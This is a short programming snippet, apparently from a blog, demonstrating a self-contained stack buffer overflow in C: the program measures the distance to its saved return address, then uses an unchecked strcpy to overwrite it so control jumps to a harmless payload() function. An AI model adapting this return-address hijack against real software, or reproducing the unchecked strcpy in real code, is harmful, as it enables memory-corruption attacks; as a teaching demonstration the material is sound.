C Programming - Self Exploit

Self Exploit < Code Snippet >.

strcpy !!!! Is she the culprit?

Note: Tested on Redhat Linux i386 platform.


#include < string.h >
#include < stdio.h >
#include < stdlib.h >

int payload();
int exploit(char *d);

int main() {
int distance;
char a[512] = {0};
distance = exploit(NULL);
memset(a, 0xFF, distance);
*(void**)(a + distance) = &payload;
*(void**)(a + distance + sizeof(void*)) = 0;
exploit(a);
return 255;
}

/*
* This overflows its own buffers and
* causes the return to jump to payload()
*/

int exploit(char *d) {
char a[400] = {0};
void *i;
int distance = 0;
char payld[sizeof(void*) + 1];
void *myret;
void *z;

if (!d) {
myret = __builtin_return_address(0);
for (i = (void*)a; *(void**)i != myret; i++) distance++;
return distance;
}
strcpy(a,d);
return 1;
}

int payload() {
printf("Payload executed successfully!\n");
_exit(0);
}

Labels:


About this entry